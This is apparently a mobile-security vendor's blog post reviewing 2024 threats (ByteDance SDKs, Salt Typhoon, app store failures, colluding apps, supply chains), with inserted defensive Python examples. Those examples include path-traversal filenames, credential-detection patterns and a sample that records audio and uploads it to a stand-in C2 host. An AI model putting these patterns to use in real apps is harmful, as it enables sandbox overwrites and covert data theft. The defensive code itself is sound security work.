For teams responsible for mobile security and applications, 2024 marked a time of rapid, dramatic shifts. While securing mobile devices, users, and data has been an ongoing challenge, the past year has seen this task grow even more difficult.
In this post, we’ll highlight some key stories that emerged in 2024, and outline what these trends will mean in the year ahead.
Story #1. ByteDance code appeared everywhere—and a TikTok ban won’t change that in 2025
Over the course of 2024, TikTok and its parent company, ByteDance, were in the news constantly. However, the risks posed go back much further. Back when our company was known as Kryptowire, we were following TikTok and were one of the first security vendors to alert people to the risks it posed.
TikTok is an example of what we’ve termed “harvester apps”: apps that collect a broad range of user and device data and use it in some fashion. One of the problematic aspects of TikTok is that it bundles a library that performs this harvesting, typically without a user’s knowledge, let alone consent.
While TikTok is indeed a problem, it’s the tip of the iceberg. Through software development kits, or SDKs, ByteDance enables app developers to re-use snippets of code—and this code, along with TikTok and other ByteDance apps, has seen massive adoption around the globe. Across industries more generally, app developers just want to get new apps and features out to the app stores quickly, and they’re growing increasingly reliant upon third-party code to facilitate these efforts. In the case of ByteDance, teams also want to facilitate integration with TikTok, which is another reason the SDKs are used so broadly.
At Quokka, we did an extensive analysis of about 10,000 mobile apps. We found that thousands of apps have problematic ByteDance libraries—and these apps have accounted for more than three billion downloads. While these libraries predominantly appear in gaming apps, they also appear in a range of other app categories as well, including social media apps and tools. (For more information on the threats posed by ByteDance code, see our prior post, “The security risks inherent in the TikTok app—and why a ban won’t solve the problem.”)
Quite simply, TikTok and ByteDance code present significant risks, and those risks won’t disappear whether or not a TikTok ban is imposed in 2025.
Story #2. Salt Typhoon underscored the massive scale of exposure to mobile threats
At least eight U.S. telecom firms and dozens of nations have been impacted by a Chinese hacking campaign known as Salt Typhoon. As of the middle of December, the hack was still reported to be active, exposing the metadata of more than one million users so far.
What’s perhaps most disturbing is that through this hack, attackers were able to effectively tap the wireless voice and data transmissions that were sent between mobile devices and backend telecommunications infrastructure. To counter this threat, users are being encouraged to use apps that send encrypted transmissions, such as Signal and WhatsApp. While that can help secure voice and text communications, that is only part of the problem.
What about all the other transmissions our mobile apps perform on a constant basis? Banking apps, gaming apps, productivity apps, dating apps – all these apps send and receive data constantly.
When we’re browsing on our laptops, we’ve been trained to look for the padlock icon when accessing a web site. The problem is there’s no equivalent for the mobile apps we use. As users, we have no way of knowing whether an app vendor encrypts data in transit, or whether it employs security measures of any kind. Nor can we easily tell if an app is intentionally or unintentionally sharing or otherwise misusing our data. Any app that can access device functionality or data can potentially transmit it unencrypted and expose sensitive assets. Modern platforms do block plain HTTP by default (Android 9 and later disables cleartext traffic unless the app opts back in; iOS App Transport Security requires TLS unless the app declares exceptions), but those opt-outs are exactly what an analyst has to look for, and no platform default stops an app from encrypting its traffic to a server that then misuses the data.
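One concrete way to look for those opt-outs, as an added example that is not code from the original post: a small Python audit over an app’s decoded AndroidManifest.xml and network security config (decoding with apktool is assumed). It flags app-wide cleartext, per-domain cleartext, and trust in user-installed CAs. Both XML documents below are constructed samples, not real apps.

```python
"""Added example (not from the original post): flag Android apps that opt out of
the platform's default protection against cleartext traffic.

Assumption: AndroidManifest.xml and res/xml/network_security_config.xml have
already been decoded from the APK (e.g. with apktool). Both XML strings below
are constructed samples, not real apps.
"""
import xml.etree.ElementTree as ET

ANDROID_NS = "http://schemas.android.com/apk/res/android"

# Constructed manifest: app-wide opt-in to plain HTTP, plus a custom NSC file.
SAMPLE_MANIFEST = """<?xml version="1.0" encoding="utf-8"?>
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
          package="com.example.sloppy">
  <application android:usesCleartextTraffic="true"
               android:networkSecurityConfig="@xml/network_security_config"/>
</manifest>"""

# Constructed network security config: the base config is sane, but one domain
# is allowed cleartext and trusts user-installed CAs (so anyone who gets a CA
# onto the device can also intercept that domain's TLS traffic).
SAMPLE_NSC = """<?xml version="1.0" encoding="utf-8"?>
<network-security-config>
  <base-config cleartextTrafficPermitted="false">
    <trust-anchors><certificates src="system"/></trust-anchors>
  </base-config>
  <domain-config cleartextTrafficPermitted="true">
    <domain includeSubdomains="true">legacy-api.example.com</domain>
    <trust-anchors><certificates src="user"/></trust-anchors>
  </domain-config>
</network-security-config>"""


def manifest_findings(manifest_xml: str) -> list:
    """Findings derived from the <application> element's attributes."""
    root = ET.fromstring(manifest_xml)
    app = root.find("application")
    findings = []
    if app is None:
        return findings
    if app.get(f"{{{ANDROID_NS}}}usesCleartextTraffic") == "true":
        findings.append("manifest: usesCleartextTraffic=true (plain HTTP allowed app-wide)")
    if app.get(f"{{{ANDROID_NS}}}networkSecurityConfig"):
        findings.append("manifest: custom networkSecurityConfig present (inspect it)")
    return findings


def nsc_findings(nsc_xml: str) -> list:
    """Findings for each config block that weakens transport security."""
    root = ET.fromstring(nsc_xml)
    findings = []
    for tag in ("base-config", "domain-config", "debug-overrides"):
        for cfg in root.iter(tag):
            domains = [d.text for d in cfg.findall("domain")] or ["(all domains)"]
            scope = ", ".join(domains)
            if cfg.get("cleartextTrafficPermitted") == "true":
                findings.append(f"{tag}: cleartext permitted for {scope}")
            for cert in cfg.iter("certificates"):
                if cert.get("src") == "user":
                    findings.append(f"{tag}: trusts user-installed CAs for {scope}")
    return findings


def audit(manifest_xml: str, nsc_xml: str = "") -> list:
    """Combined audit; an empty nsc_xml means the app ships no NSC file."""
    findings = manifest_findings(manifest_xml)
    if nsc_xml:
        findings.extend(nsc_findings(nsc_xml))
    return findings


if __name__ == "__main__":
    for finding in audit(SAMPLE_MANIFEST, SAMPLE_NSC):
        print(finding)
```

Note that `debug-overrides` only take effect in debuggable builds, so a finding there matters for test builds that leak out rather than for store releases; and an app with no NSC and no `usesCleartextTraffic` attribute on Android 9+ gets the secure default, which is the baseline this check measures against.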
This hack has really opened the eyes of many, clearly illustrating that telecommunications firms, and organizations more generally, are underinvested in mobile security.
Story #3. App store policing continued to be ineffective in protecting users
When it comes to accessing mobile apps, the app stores of Apple and Google have pretty much been the only game in town for iOS and Android devices, respectively. These companies take a cut of around 30% from app sales on their stores, making billions of dollars in the process.
The app stores do provide some safeguards, but they’re far from foolproof. We may hear about malicious apps being detected and pulled, and that can make us feel better. For example, in the second quarter of 2024, Google removed one million apps from Google Play, and 3% of all iOS apps were removed from the Apple App Store.
However, the reality is that every week we see problematic apps that make it onto the stores and get downloaded by hundreds of thousands, maybe even millions, of users. Too often, it is only after apps have been broadly downloaded that security risks are discovered, most often by third-party security firms and labs. Here are just a few examples:
- In May 2024, Microsoft disclosed the “Dirty Stream” attack pattern, in which an app accepts a file from another app’s content provider and saves it under the filename that provider supplies, so a malicious provider can steer the write into the receiving app’s private storage. Microsoft notified the app stores about some of the affected apps; by that point, two of them had accumulated over one billion and over 500 million installs, respectively.
- A vulnerability in a file manager app on Xiaomi Android devices was detected, but only after that app had accounted for more than one billion installs.
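The Dirty Stream example above is a path-traversal problem on the receiving side, and the fix is a filename check. The following is an added example, not code from the original post or from Microsoft’s write-up: the vulnerable concatenation beside a hardened version, written in Python to show the logic (an Android app would apply the same check in Kotlin or Java before opening the destination file). `PRIVATE_DIR` and the attacker-supplied names are constructed.

```python
"""Added example (not from the original post or from Microsoft's write-up):
the filename check the receiving app in a "Dirty Stream"-style exchange should
apply. The victim asks another app for a file, reads the display name from that
app's content provider, and writes the stream under that name inside its own
private directory. A malicious provider returns a name containing path
traversal, so the write lands elsewhere in the victim's sandbox.

PRIVATE_DIR and ATTACK_NAMES are constructed for illustration.
"""
import posixpath

PRIVATE_DIR = "/data/data/com.example.victim/cache/downloads"  # constructed

# Constructed names a malicious provider could return for the file it serves.
ATTACK_NAMES = [
    "../../shared_prefs/com.example.victim_preferences.xml",  # overwrite settings
    "../../databases/app.db",                                 # overwrite a database
]


def unsafe_destination(private_dir: str, display_name: str) -> str:
    """The vulnerable pattern: concatenate the provider-supplied name as-is."""
    return private_dir + "/" + display_name


def escapes_private_dir(private_dir: str, path: str) -> bool:
    """True if `path`, once normalised, is not inside `private_dir`."""
    base = posixpath.normpath(private_dir)
    target = posixpath.normpath(path)
    return posixpath.commonpath([base, target]) != base


def safe_destination(private_dir: str, display_name: str) -> str:
    """Hardened: accept only a single plain path component, then prove the
    joined path still sits directly inside private_dir (defence in depth)."""
    if (not display_name or "\x00" in display_name
            or "/" in display_name or "\\" in display_name
            or display_name in (".", "..")):
        raise ValueError(f"rejecting provider-supplied filename {display_name!r}")
    base = posixpath.normpath(private_dir)
    target = posixpath.normpath(posixpath.join(base, display_name))
    if posixpath.dirname(target) != base:
        raise ValueError("destination escapes private directory")
    return target


def demo() -> dict:
    """Resolve each attacker name and one benign name through both paths."""
    result = {}
    for name in ATTACK_NAMES + ["report.pdf"]:
        try:
            safe = safe_destination(PRIVATE_DIR, name)
        except ValueError as exc:
            safe = f"REJECTED: {exc}"
        unsafe = unsafe_destination(PRIVATE_DIR, name)
        result[name] = {
            "unsafe": unsafe,
            "unsafe_escapes": escapes_private_dir(PRIVATE_DIR, unsafe),
            "safe": safe,
        }
    return result


if __name__ == "__main__":
    for name, outcome in demo().items():
        print(name, outcome)
```

An even simpler option, which Microsoft’s guidance also allows for, is to ignore the provider’s display name entirely and store the stream under a name the receiving app generates itself; the check above is for cases where the original name must be preserved.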
These examples and many others underscore how having just two major app stores hasn’t ameliorated mobile app risks. It seems safe to assume that having more app stores will multiply these risks—and that’s exactly what’s expected to happen.
The app store ecosystem is evolving. The Digital Markets Act took effect in the EU, compelling Apple to allow alternative marketplaces to distribute iOS apps there. In addition, there have been calls to break up Google, and additional app stores are being introduced.
Story #4. Sloppy and colluding apps kept presenting risks
In addition to the harvester app category described earlier, there are a range of other problematic apps that continued to cause problems in 2024.
Sloppy apps
Sloppy apps continue to make it into app stores—and onto user devices. These apps aren’t necessarily intentionally malicious. Often, the developer simply missed the fact that some third-party code was risky. For example, as with the ByteDance SDKs, some third-party libraries collect and transmit user data to an external site. Alternatively, developers may have missed security vulnerabilities in their own code. For example, we see apps that hard-code credentials (API keys, service passwords, private keys) in the shipped binary, where anyone who unpacks the app can read and misuse them.
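Hard-coded credentials are one of the easiest sloppy-app defects to catch before release. As an added example, not the post’s own tooling: a minimal Python scanner run over decompiled app sources (resource XML, Java/Kotlin/smali, asset files). The rule set is deliberately tiny and illustrative; a production scan uses a maintained rule set. `SAMPLE_FILES` is constructed, and the AWS key id in it is the placeholder from AWS’s own documentation.

```python
"""Added example (not the post's own tooling): a minimal hard-coded credential
scanner for decompiled app sources. RULES is illustrative, not complete;
SAMPLE_FILES is constructed. AKIAIOSFODNN7EXAMPLE is the placeholder access
key id used in AWS documentation, not a live credential.
"""
import re

# (label, pattern). Real rule sets are far larger and include entropy checks.
RULES = [
    ("AWS access key id", re.compile(r"\bAKIA[0-9A-Z]{16}\b")),
    ("Google API key", re.compile(r"\bAIza[0-9A-Za-z_\-]{35}\b")),
    ("private key block", re.compile(r"-----BEGIN (?:RSA |EC |OPENSSH )?PRIVATE KEY-----")),
    ("credentials in URL", re.compile(r"https?://[^\s/:@\"']+:[^\s/@\"']+@")),
    ("password assignment",
     re.compile(r"(?i)(?:password|passwd|pwd)\s*[=:]\s*[\"'][^\"']{4,}[\"']")),
]

# Constructed decompiled-source snippets keyed by path inside the APK.
SAMPLE_FILES = {
    "res/values/strings.xml":
        '<string name="maps_key">' + "AIzaSyA" + "0" * 32 + "</string>",
    "com/example/app/net/ApiClient.java":
        'static final String UPLOAD_URL = "https://svc-user:Sup3rS3cret@api.example.com/upload";\n'
        'private static final String DB_PASSWORD = "changeme123";',
    "assets/config.properties":
        "aws.accessKeyId=AKIAIOSFODNN7EXAMPLE\nlog.level=INFO",
    "com/example/app/MainActivity.java":
        'String title = "Welcome";',
}


def redact(secret: str) -> str:
    """Keep enough of a match to triage it, not enough to reuse it."""
    return secret if len(secret) <= 8 else secret[:4] + "..." + secret[-2:]


def scan_text(path: str, text: str) -> list:
    """Apply every rule to every line; return one finding per match."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        for label, pattern in RULES:
            for match in pattern.finditer(line):
                findings.append({"file": path, "line": lineno,
                                 "rule": label, "match": redact(match.group(0))})
    return findings


def scan_files(files: dict) -> list:
    """Scan a mapping of path -> file contents (e.g. from a decompiled APK)."""
    findings = []
    for path, text in files.items():
        findings.extend(scan_text(path, text))
    return findings


if __name__ == "__main__":
    for finding in scan_files(SAMPLE_FILES):
        print(f"{finding['file']}:{finding['line']}  {finding['rule']}  {finding['match']}")
```

Running this against decompiler output is most useful as a gate in the build pipeline, where a hit fails the build; running it only after publication, as the post notes, means the secret has already shipped.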
Colluding apps
Over the course of 2024, the risks posed by colluding apps continued to be exposed. The problem is that apps don’t operate in isolation. While a given app may appear to be innocuous on its own, it may pose a significant risk by colluding with another app on a device. One app may be using the microphone to create recordings, while another app could send those recordings to some malicious actor.
Addressing this risk is only getting more difficult. In part, this is because the number and variety of apps on a given device keeps increasing. We’ve seen accounts of one device having 8,200 apps. To exploit this, malicious actors can publish almost anything, whether a photo app, a note pad, or a niche business app, and encourage users to download it; each app passes review on its own because the dangerous capability only appears in combination.
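Finding colluding pairs starts with asking which apps on a device could share data at all. As an added example, not the post’s own method: a heuristic pass over a device inventory that pairs an app holding a data-source permission (microphone, camera, contacts, location) with an app holding the network sink, where the two share a channel, namely the same signing certificate or the same `sharedUserId`. The inventory is constructed; real data would come from `adb shell dumpsys package` or an MDM export. Exported components and intents are another channel and would need a separate check.

```python
"""Added example (not the post's own method): a heuristic for candidate
colluding app pairs. One app holds a data *source* permission and no network
access, another holds the INTERNET *sink*, and the two share a channel that
lets them exchange data: the same signing certificate or the same sharedUserId
(deprecated since API 29 but still honoured for existing apps).

INVENTORY is constructed; nothing here identifies a real app.
"""
from itertools import combinations

SOURCES = {"RECORD_AUDIO", "CAMERA", "READ_CONTACTS", "READ_SMS",
           "ACCESS_FINE_LOCATION", "READ_CALL_LOG"}
SINK = "INTERNET"

# Constructed inventory: package, granted permissions, signer, sharedUserId.
INVENTORY = [
    {"pkg": "com.example.voicememo", "perms": {"RECORD_AUDIO"},
     "cert": "sha256:aaaa", "shared_uid": None},
    {"pkg": "com.example.wallpapers", "perms": {"INTERNET"},
     "cert": "sha256:aaaa", "shared_uid": None},
    {"pkg": "com.example.bank", "perms": {"INTERNET", "CAMERA"},
     "cert": "sha256:bbbb", "shared_uid": None},
    {"pkg": "com.example.notes", "perms": {"READ_CONTACTS"},
     "cert": "sha256:cccc", "shared_uid": "com.example.shared"},
    {"pkg": "com.example.sync", "perms": {"INTERNET"},
     "cert": "sha256:dddd", "shared_uid": "com.example.shared"},
]


def shared_channel(a: dict, b: dict):
    """Name the channel two apps could use to pass data, or None."""
    if a["cert"] == b["cert"]:
        return "same signing certificate"
    if a["shared_uid"] and a["shared_uid"] == b["shared_uid"]:
        return "same sharedUserId"
    return None


def candidate_pairs(inventory: list) -> list:
    """Return (source_pkg, sink_pkg, source_perms, channel) for each candidate.

    Apps that already hold INTERNET themselves are not treated as sources:
    they need no partner, and flagging them would only add noise."""
    out = []
    for a, b in combinations(inventory, 2):
        for src, snk in ((a, b), (b, a)):
            src_perms = src["perms"] & SOURCES
            if not src_perms or SINK in src["perms"] or SINK not in snk["perms"]:
                continue
            channel = shared_channel(src, snk)
            if channel:
                out.append((src["pkg"], snk["pkg"], sorted(src_perms), channel))
    return out


if __name__ == "__main__":
    for src, snk, perms, channel in candidate_pairs(INVENTORY):
        print(f"{src} ({', '.join(perms)}) -> {snk} via {channel}")
```

This is a triage filter, not a verdict: a flagged pair still needs behavioural confirmation that data actually crosses the channel, which is the testing of app interactions the post describes.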
For more information on the range of risky apps in play today, see our blog post, “8 ways mobile apps jeopardize your business.”
Story #5. AI-powered app development added fuel to the fire
Developers continue to use AI to expedite and streamline the creation of new code. This has resulted in a flood of low-quality offerings hitting the app stores. The increasing use of AI poses numerous challenges.
Patterns being repeated
For better or worse, AI will replicate patterns. If one characteristic is used to inform an AI model, that characteristic will start to be a common trait that it keeps perpetuating. This can be good, that is, strong security practices could be repeated. However, it can often be bad: Traits like unknown security vulnerabilities and apps that employ poor security practices can also keep being replicated.
Bad guys started using AI too
It isn’t just legitimate app developers that are using AI. Malicious app developers, cyber criminals, and nation-states are using AI as well. As a result, AI isn’t just contributing to the delivery of sloppy apps; it’s fueling the creation and continued refinement of malware.
A key way malicious actors use AI is to obfuscate their code in order to evade existing security technologies. For example, many security mechanisms rely on establishing signatures of malicious code and using those signatures to identify and block subsequent use of that code. Malware developers are now leveraging AI to constantly tweak the code. While it may deliver the same core functionality, the modified code will look different enough to have a new signature generated, which means it would need to be identified and handled as a new threat in traditional security tools.
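The signature problem above is easy to see on a toy sample. As an added example, not code from the original post: two constructed, smali-like listings of the same capability (start the microphone, open an HTTP connection, obtain its output stream). The second is a mechanical rewrite of the first: renamed registers, inserted no-ops, an extra move. A byte-level hash signature for the first does not match the second, while a fingerprint built from the APIs actually called is identical for both, and a behaviour rule over that fingerprint flags both. The class names are real Android and Java APIs; the listings and the URL are constructed.

```python
"""Added example (not from the original post): why a byte-level signature breaks
on trivial code rewrites while a behaviour-level fingerprint does not.

SAMPLE_V1 and SAMPLE_V2 are constructed, smali-like listings of the same
capability; the C2 hostname uses the reserved .invalid TLD.
"""
import hashlib
import re

SAMPLE_V1 = """\
invoke-virtual {v0}, Landroid/media/AudioRecord;->startRecording()V
const-string v1, "http://c2.example.invalid/upload"
invoke-direct {v2, v1}, Ljava/net/URL;-><init>(Ljava/lang/String;)V
invoke-virtual {v3}, Ljava/net/HttpURLConnection;->getOutputStream()Ljava/io/OutputStream;
"""

# Same behaviour after a mechanical rewrite: new registers, no-ops, extra move.
SAMPLE_V2 = """\
nop
invoke-virtual {v5}, Landroid/media/AudioRecord;->startRecording()V
const-string v6, "http://c2.example.invalid/upload"
move-object v7, v6
nop
invoke-direct {v8, v7}, Ljava/net/URL;-><init>(Ljava/lang/String;)V
invoke-virtual {v9}, Ljava/net/HttpURLConnection;->getOutputStream()Ljava/io/OutputStream;
"""

# Captures "Lpkg/Class;->method" from any invoke-* instruction.
INVOKE_RE = re.compile(r"invoke-\w+(?:/range)?\s*\{[^}]*\},\s*(L[^;]+;->[^(\s]+)")

# Capability classes for a crude "record then send" rule.
SOURCE_APIS = ("Landroid/media/AudioRecord;", "Landroid/media/MediaRecorder;",
               "Landroid/hardware/Camera;")
NETWORK_APIS = ("Ljava/net/HttpURLConnection;", "Ljava/net/URL;",
                "Ljava/net/Socket;", "Lokhttp3/")


def byte_signature(listing: str) -> str:
    """What a hash-based signature keys on: the exact bytes."""
    return hashlib.sha256(listing.encode()).hexdigest()


def api_fingerprint(listing: str) -> tuple:
    """What a behaviour-based detector keys on: the set of APIs invoked."""
    return tuple(sorted(set(INVOKE_RE.findall(listing))))


def looks_like_exfiltration(fingerprint: tuple) -> bool:
    """True if the code both captures from a sensor and talks to the network."""
    has_source = any(api.startswith(SOURCE_APIS) for api in fingerprint)
    has_network = any(api.startswith(NETWORK_APIS) for api in fingerprint)
    return has_source and has_network


if __name__ == "__main__":
    for name, listing in (("v1", SAMPLE_V1), ("v2", SAMPLE_V2)):
        fp = api_fingerprint(listing)
        print(name, byte_signature(listing)[:16], fp, looks_like_exfiltration(fp))
```

Real obfuscation goes further than this (reflection, string encryption, native code, dynamic loading), which is why behavioural detection in practice also has to observe what the app does at runtime rather than only what its bytecode names.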
Story #6. Software supply chain attacks kept increasing—and getting harder to guard against
Back in 2023, the Cybersecurity and Infrastructure Security Agency (CISA) in the United States recommended that software vendors also provide a software bill of materials (SBOM), which lists the components used to build a given application. With an SBOM, security teams and vendors can check each component for known risk. So, for example, if an application includes a risky ByteDance library, teams can spot it in the SBOM and take steps to guard against the app’s use or the threats it poses. Now, U.S. government bodies such as the Army and the Food and Drug Administration (FDA) require SBOMs for software and devices they procure or approve.
Beyond being able to inspect an SBOM, what’s key is that teams can verify that the SBOM is correct (that the listed components, versions and hashes match what actually ships) and determine whether it includes risky or malicious code. The proliferation of AI-generated code will continue to make this effort difficult. If a large language model (LLM) generated half of an app’s code, that code may have been drawn from a large number of different apps and libraries, some of which may be secure, others risky or downright malicious, and none of which will appear as a named component in the SBOM.
Whether it’s third-party, open-source code or AI-assisted code, the reality is that developers are doing less and less actual coding. It keeps getting harder to figure out where any given code snippet came from. How can teams build an accurate SBOM and definitively determine that the code is in fact secure?
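What “inspect and verify the SBOM” looks like in practice, as an added example that is not the post’s tooling: a Python check over a CycloneDX JSON SBOM that flags components from a denylisted publisher namespace and components that cannot be verified against what ships (no version, or no SHA-256 hash), plus a function that checks one listed hash against the bytes of the bundled artifact. The SBOM, the artifact bytes and the denylist are constructed for illustration; the `com.bytedance.` prefix appears only because the post singles out that publisher.

```python
"""Added example (not the post's tooling): inspect and verify a CycloneDX SBOM.

SAMPLE_SBOM, OKHTTP_BYTES and DENYLIST_PREFIXES are constructed; the okhttp
coordinates are real Maven coordinates but the bytes are a stand-in, so the
hash below is the hash of the stand-in, not of any real release.
"""
import hashlib
import json

DENYLIST_PREFIXES = ("com.bytedance.", "com.tiktok.")   # illustrative denylist

# Constructed stand-in for the bytes of a library bundled in the app.
OKHTTP_BYTES = b"constructed stand-in for a third-party jar"

SAMPLE_SBOM = json.dumps({
    "bomFormat": "CycloneDX",
    "specVersion": "1.5",
    "components": [
        {"type": "library", "group": "com.bytedance.example", "name": "tracking-sdk",
         "version": "1.2.3", "purl": "pkg:maven/com.bytedance.example/tracking-sdk@1.2.3"},
        {"type": "library", "group": "com.squareup.okhttp3", "name": "okhttp",
         "version": "4.12.0",
         "hashes": [{"alg": "SHA-256",
                     "content": hashlib.sha256(OKHTTP_BYTES).hexdigest()}]},
        # Code with no provenance at all, e.g. pasted from an LLM session.
        {"type": "library", "name": "ai-generated-helper"},
    ],
})


def coordinates(component: dict) -> str:
    group = component.get("group")
    return f"{group}/{component['name']}" if group else component["name"]


def check_sbom(sbom_json: str) -> list:
    """Return (component, kind, reason) findings for every component."""
    findings = []
    for component in json.loads(sbom_json).get("components", []):
        coord = coordinates(component)
        if (component.get("group") or "").startswith(DENYLIST_PREFIXES):
            findings.append((coord, "denylisted", "publisher namespace is on the denylist"))
        if not component.get("version"):
            findings.append((coord, "no-version", "cannot be matched to a release or advisory"))
        if not any(h.get("alg") == "SHA-256" for h in component.get("hashes", [])):
            findings.append((coord, "no-hash", "cannot be verified against the shipped artifact"))
    return findings


def matches_shipped_artifact(component: dict, artifact: bytes) -> bool:
    """Verify a component's SHA-256 entry against the bytes that actually ship."""
    digest = hashlib.sha256(artifact).hexdigest()
    return any(h.get("alg") == "SHA-256" and h.get("content", "").lower() == digest
               for h in component.get("hashes", []))


def find_component(sbom_json: str, name: str) -> dict:
    return next(c for c in json.loads(sbom_json)["components"] if c["name"] == name)


if __name__ == "__main__":
    for coord, kind, reason in check_sbom(SAMPLE_SBOM):
        print(f"{kind:11} {coord}: {reason}")
    okhttp = find_component(SAMPLE_SBOM, "okhttp")
    print("okhttp hash matches shipped bytes:", matches_shipped_artifact(okhttp, OKHTTP_BYTES))
```

The hash check is the part that makes an SBOM more than a self-declaration: a component with no hash can be listed accurately and still differ from what is in the APK, and code that was never packaged as a component (the AI-generated half of the app in the post’s scenario) never reaches this check at all.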
Moving into 2025, we expect to see more attacks on software supply chains, and more vulnerabilities making it into software.
Key takeaways: What to be ready for in 2025
The stories that occurred in 2024 all share a common trait: They highlight problematic trends that show no signs of abating in 2025. Here are some key takeaways for security teams as they head into the new year:
- Quality of app intelligence will be critical. As we wrap up 2024 and head into the new year, one common complaint we’re hearing from security teams is that they’re drowning in noise. When teams are overloaded by noise, it tends to breed inaction or leave teams focusing on the wrong things. Teams must be able to leverage timely, targeted intelligence that provides actionable insights. Critically, they must be able to identify when apps exhibit signs of malicious behavior or intent. Finally, you can’t test these apps in isolation; you have to test the way apps interact with other apps and services in the device ecosystem.
- Scaling security will be critical. Key trends from 2024 underscore the accelerating, rapidly growing nature of mobile app development and threats. Around the world, teams are leveraging third-party and open-source code and AI. These techniques are dramatically accelerating app delivery. Unfortunately, these techniques don’t just speed the delivery of legitimate, secure apps, they also speed the production of problematic and malicious apps. Fundamentally, the more apps that become available and get downloaded onto devices, the more apps that teams have to test.
- Shortcomings of on-device security approaches will be increasingly exposed. Many mobile security technologies employ on-device protection mechanisms. Mobile device users, not to mention manufacturers like Apple and Google, don’t necessarily want some mechanism being installed on mobile devices that’s tracking all applications, all private information, browsing histories, and so on. Beyond the huge privacy concerns, these types of mechanisms can place a significant drain on a device’s battery and other resources. Fundamentally, these mechanisms aren’t equipped to scale to meet the pressing demands security teams face today.
Quokka can help
Heading into 2025, development and security organizations are contending with some daunting challenges. The good news is that Quokka is uniquely equipped to help.
Our Contextual Mobile Security Intelligence identifies malicious behaviors, colluding apps, privacy risks, and compliance gaps—providing precise, actionable insights to reduce risk and protect your organization. Our solutions don’t involve on-device testing and don’t require agents. That’s really the only way you can scale the testing of all the apps that may reside on a given user’s device, and all the ways those apps can interact with each other. Quokka offers these solutions:
- Q-scout. With behavior-driven detection, Q-scout identifies hidden threats, streamlines app vetting, and enables swift action to secure your mobile ecosystem—regardless of the operating system (OS).
- Q-mast. Q-mast embeds security into the app development lifecycle, conducting comprehensive testing to eliminate vulnerabilities and ensure secure apps are delivered on day one.
With Quokka, you’re equipped to tackle today’s challenges and stay ahead of tomorrow’s threats. Contact us today to learn more or schedule a demo. In addition, to learn more, you can view our webcast, “Top Mobile Security Stories & Trends of 2024 and 2025 Predictions.”